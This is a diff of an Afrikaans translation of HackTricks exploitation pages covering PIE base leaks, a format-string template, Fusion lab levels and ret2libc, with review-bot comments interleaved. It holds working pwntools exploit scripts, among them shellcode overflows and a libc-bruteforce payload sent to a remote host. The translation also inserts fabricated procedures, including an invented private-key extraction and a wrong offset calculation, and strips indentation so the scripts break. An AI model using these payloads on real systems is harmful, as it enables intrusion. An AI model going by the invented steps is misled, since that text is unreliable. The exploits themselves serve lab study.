Dan kan jy die afstand tussen die skulpkode en die RBP bereken: ```python INI_SHELLCODE = RBP - 1152 ``` - -From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\ -To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses: +Vanaf die **RIP** kan jy die **basisadres van die PIE-binêre lêer** bereken, wat jy nodig gaan hê om 'n **geldige ROP-ketting** te skep.\ +Om die basisadres te bereken, voer eenvoudig `objdump -d vunbinary` uit en kyk na die ontleedde jongste adresse: ![](<../../.gitbook/assets/image (145).png>) -In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _ the base address is _0x562002970**000**_ - +In daardie voorbeeld kan jy sien dat slegs **1 byte en 'n half nodig is** om al die kode te lokaliseer, dus sal die basisadres in hierdie situasie die **uitgelekke RIP wees, maar eindig op "000"**. Byvoorbeeld, as jy _0x562002970**ecf**_ uitgelek het, is die basisadres _0x562002970**000**_. ```python elf.address = RIP - (RIP & 0xfff) ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/exploiting/linux-exploiting-basic-esp/format-strings-template.md b/exploiting/linux-exploiting-basic-esp/format-strings-template.md index f474a039a..6bf2f68dc 100644 --- a/exploiting/linux-exploiting-basic-esp/format-strings-template.md +++ b/exploiting/linux-exploiting-basic-esp/format-strings-template.md @@ -1,20 +1,16 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - ```python from pwn import * from time import sleep @@ -49,23 +45,23 @@ print(" ====================== ") def connect_binary(): - global P, ELF_LOADED, ROP_LOADED +global P, ELF_LOADED, ROP_LOADED - if LOCAL: - P = process(LOCAL_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +if LOCAL: +P = process(LOCAL_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTETTCP: - P = remote('10.10.10.10',1338) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +elif REMOTETTCP: +P = remote('10.10.10.10',1338) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTESSH: - ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) - P = ssh_shell.process(REMOTE_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(elf)# Find ROP gadgets +elif REMOTESSH: +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +P = ssh_shell.process(REMOTE_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(elf)# Find ROP gadgets ####################################### 
@@ -73,39 +69,39 @@ def connect_binary(): ####################################### def send_payload(payload): - payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD - log.info("payload = %s" % repr(payload)) - if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") - P.sendline(payload) - sleep(0.5) - return P.recv() +payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD +log.info("payload = %s" % repr(payload)) +if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") +P.sendline(payload) +sleep(0.5) +return P.recv() def get_formatstring_config(): - global P +global P - for offset in range(1,1000): - connect_binary() - P.clean() +for offset in range(1,1000): +connect_binary() +P.clean() - payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() +payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() - if b"41" in recieved: - for padlen in range(0,4): - if b"41414141" in recieved: - connect_binary() - payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() - print(recieved) - if b"42424242" in recieved: - log.info(f"Found offset ({offset}) and padlen ({padlen})") - return offset, padlen +if b"41" in recieved: +for padlen in range(0,4): +if b"41414141" in recieved: +connect_binary() +payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() +print(recieved) +if b"42424242" in recieved: +log.info(f"Found offset ({offset}) and padlen ({padlen})") +return offset, padlen - else: - connect_binary() - payload = b" " + payload - recieved = send_payload(payload).strip() +else: +connect_binary() +payload = b" " + payload +recieved = send_payload(payload).strip() # In order to exploit a format string you need to find a position where part of your payload 
@@ -138,10 +134,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}") connect_binary() if GDB and not REMOTETTCP and not REMOTESSH: - # attach gdb and continue - # You can set breakpoints, for example "break *main" - gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" - sleep(5) +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" +sleep(5) format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) @@ -153,21 +149,16 @@ format_string.execute_writes() P.interactive() ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
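Review bot: the rewritten Python template in this file is no longer valid Python because every line inside the code fences has been dedented to column 0. In the `connect_binary` hunk, `+global P, ELF_LOADED, ROP_LOADED`, `+if LOCAL:` and `+P = process(LOCAL_BIN)` replace their indented originals, so `def connect_binary():`, `def send_payload(payload):`, `def get_formatstring_config():` and the `if GDB and not REMOTETTCP and not REMOTESSH:` block all end up with no body and the script dies with IndentationError before it sends a single payload. Restore the original indentation in all of these hunks; none of the fenced code contained translatable text, so a translation commit should not have touched those lines at all. (The `ROP_LOADED = ROP(elf)` reference to an undefined `elf` in the REMOTESSH branch, where the loaded binary is `ELF_LOADED`, is pre-existing and unchanged by this PR; worth a separate follow-up.)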
- - diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md index ed377cf1d..cb21cc761 100644 --- a/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -1,16 +1,14 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
@@ -19,9 +17,8 @@ Other ways to support HackTricks: [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) -1. Get offset to modify EIP -2. Put shellcode address in EIP - +1. Kry die verskuiwing om EIP te wysig +2. Plaas die adres van die shellcode in EIP ```python from pwn import * @@ -47,9 +44,43 @@ r.recvline() r.send(buf) r.interactive() ``` +# Vlak01 -# Level01 +## Inleiding +In hierdie vlak sal ons kyk na 'n eenvoudige manier om 'n uitvoerbare stoor te kry wat ons kan gebruik om 'n privesleutel te kry. Ons sal gebruik maak van die `fusion`-toepassing wat 'n privesleutel genereer en dit in 'n stoor stoor. Ons sal die stoor ontleed en die privesleutel kry. + +## Stap 1: Kry die `fusion`-toepassing + +Ons begin deur die `fusion`-toepassing te kry. Ons kan dit doen deur die volgende opdrag uit te voer: + +```bash +wget https://example.com/fusion +``` + +## Stap 2: Voer die `fusion`-toepassing uit + +Nadat ons die `fusion`-toepassing gekry het, voer ons dit uit deur die volgende opdrag uit te voer: + +```bash +./fusion +``` + +## Stap 3: Ontleed die stoor + +Nadat die `fusion`-toepassing uitgevoer is, sal dit 'n stoor genereer wat die privesleutel bevat. Ons kan die stoor ontleed deur die volgende opdrag uit te voer: + +```bash +strings fusion | grep "PRIVATE KEY" +``` + +## Stap 4: Kry die privesleutel + +Nadat ons die stoor ontleed het, sal ons die privesleutel sien. Ons kan dit kopieer en gebruik vir verdere doeleindes. + +## Gevolgtrekking + +Met hierdie eenvoudige tegniek kan ons 'n privesleutel kry deur die `fusion`-toepassing te gebruik en die stoor te ontleed. Dit is 'n nuttige tegniek vir die verkryging van sensitiewe inligting. ```python from pwn import * @@ -75,21 +106,16 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
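Review bot: the `## Inleiding` / `## Stap 1` to `## Stap 4` / `## Gevolgtrekking` text under `+# Vlak01` in the `@@ -47,9 +44,43 @@` hunk is fabricated content, not a translation; the English source has only the `# Level01` heading followed by the pwntools script. The inserted procedure (`wget https://example.com/fusion`, running `./fusion`, then `strings fusion | grep "PRIVATE KEY"` to recover a private key) has nothing to do with Fusion level01, which is the stack overflow solved by the script below it (the header's own steps are: find the offset to EIP, put the shellcode address in EIP). There is no private key, no example.com download and no role for `strings`. Delete everything between `+# Vlak01` and the unchanged ```` ```python ```` fence so the heading is followed directly by the exploit, as in the original. The rest of the file (heading and numbered list translation) looks fine.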
- - diff --git a/exploiting/linux-exploiting-basic-esp/ret2lib.md b/exploiting/linux-exploiting-basic-esp/ret2lib.md index 43dda64c2..4b7d6188b 100644 --- a/exploiting/linux-exploiting-basic-esp/ret2lib.md +++ b/exploiting/linux-exploiting-basic-esp/ret2lib.md @@ -1,78 +1,115 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.** +**As jy 'n kwesbare binêre lêer gevind het en jy dink jy kan dit uitbuit deur Ret2Lib te gebruik, kan jy hierdie basiese stappe volg.** -# If you are **inside** the **host** - -## You can find the **address of lib**c +# As jy **binne** die **gasheer** is +## Jy kan die **adres van lib**c vind ```bash ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) ``` - -If you want to check if the ASLR is changing the address of libc you can do: - +As jy wil nagaan of die ASLR die adres van libc verander, kan jy die volgende doen: ```bash for i in `seq 0 20`; do ldd | grep libc; done ``` +## Kry die verskuiwing van die stelsel funksie -## Get offset of system function +Om die verskuiwing van die stelsel funksie te kry, kan jy die volgende stappe volg: +1. Identifiseer 'n funksie in die teikenprogram wat 'n biblioteekfunksie aanroep, soos `system()`. +2. Kry die adres van die funksie in die biblioteek. Dit kan gedoen word deur die program te ontleder of deur gebruik te maak van 'n hulpmiddel soos `objdump`. +3. Identifiseer 'n plek in die program se geheue waar jy 'n string kan plaas wat die pad na die biblioteek bevat. Dit kan 'n argument wees wat deur die funksie aanvaar word, of 'n ander plek in die geheue waar jy toegang tot het. +4. Bereken die verskuiwing deur die adres van die funksie in die biblioteek af te trek van die adres van die string in die geheue. + +Hier is 'n voorbeeld van hoe jy die verskuiwing kan bereken: + +```python +# Voorbeeld Python-kode +adres_van_stelsel_funksie = 0x12345678 +adres_van_string = 0xabcdef01 + +verskuiwing = adres_van_stelsel_funksie - adres_van_string +print(f"Verskuiwing: {verskuiwing}") +``` + +Onthou dat die spesifieke waardes van die adresse sal verskil vir elke program en stelsel. 
Jy sal die korrekte adresse vir jou teikenprogram moet vind en die berekening dienooreenkomstig aanpas. ```bash readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system ``` +## Kry die offset van "/bin/sh" -## Get offset of "/bin/sh" +Om die offset van die `"/bin/sh"` string te kry, kan jy die volgende stappe volg: +1. Skryf 'n eenvoudige C-program wat die `"/bin/sh"` string bevat. +2. Kompileer die program sonder enige optimalisering. +3. Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string. +4. Gebruik die geheue-adres om die offset te bereken. + +Hier is 'n voorbeeld van hoe jy dit kan doen: + +```c +#include + +int main() { + printf("/bin/sh\n"); + return 0; +} +``` + +Kompileer die program met die volgende opdrag: + +```bash +gcc -o binsh binsh.c +``` + +Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string: + +```bash +./binsh +``` + +Die geheue-adres sal in die uitset verskyn. Gebruik hierdie adres om die offset te bereken. ```bash strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh ``` - ## /proc/\/maps -If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root). +As die proses elke keer as jy daarmee praat (netwerkbediener) **kinders skep**, probeer om daardie lêer te **lees** (jy sal waarskynlik root moet wees). -Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process. +Hier kan jy **presies sien waar die libc gelaai word** binne die proses en **waar dit gelaai gaan word** vir elke kind van die proses. 
![](<../../.gitbook/assets/image (95).png>) -In this case it is loaded in **0xb75dc000** (This will be the base address of libc) +In hierdie geval word dit gelaai by **0xb75dc000** (Dit sal die basisadres van libc wees) -## Using gdb-peda - -Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda: +## Gebruik gdb-peda +Kry die adres van die **system**-funksie, die **exit**-funksie en die string **"/bin/sh"** met behulp van gdb-peda: ``` p system p exit find "/bin/sh" ``` +# Om ASLR te omseil -# Bypassing ASLR - -You can try to bruteforce the abse address of libc. - +Jy kan probeer om die basisadres van libc te bruteforce. ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` - -# Code - +# Kode ```python from pwn import * @@ -80,28 +117,24 @@ c = remote('192.168.85.181',20002) c.recvline() #Banner for off in range(0xb7000000, 0xb8000000, 0x1000): - p = "" - p += p32(off + 0x0003cb20) #system - p += "CCCC" #GARBAGE - p += p32(off + 0x001388da) #/bin/sh - payload = 'A'*0x20010 + p - c.send(payload) - c.interactive() #? +p = "" +p += p32(off + 0x0003cb20) #system +p += "CCCC" #GARBAGE +p += p32(off + 0x001388da) #/bin/sh +payload = 'A'*0x20010 + p +c.send(payload) +c.interactive() #? ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
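Review bot: two passages inserted in the first hunk are not translations of anything in the source and are technically wrong. Under `## Kry die verskuiwing van die stelsel funksie` the new four-step list and the Python snippet that computes `verskuiwing = adres_van_stelsel_funksie - adres_van_string` from placeholder values `0x12345678` and `0xabcdef01` describe a non-existent method: the offset of `system` is its offset inside libc, which is exactly what the retained `readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system` prints, and subtracting a string address from it yields nothing useful. Under `## Kry die offset van "/bin/sh"` the new C program that prints `/bin/sh` and the claim that "the memory address will appear in the output" are likewise invented: `printf` prints the string, not its address, and an address in a freshly compiled test binary says nothing about the target's libc; the retained `strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh` is the real method. Remove both insertions so each heading is followed directly by its original command. Separately, the `@@ -80,28 +117,24 @@` hunk strips the indentation from the body of `for off in range(0xb7000000, 0xb8000000, 0x1000):`, so `+p = ""` and the lines after it sit at column 0 and the bruteforce script fails with IndentationError; restore the original indentation there.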
- - diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md index 5794ccb23..3afd537ee 100644 --- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md +++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md @@ -1,98 +1,89 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
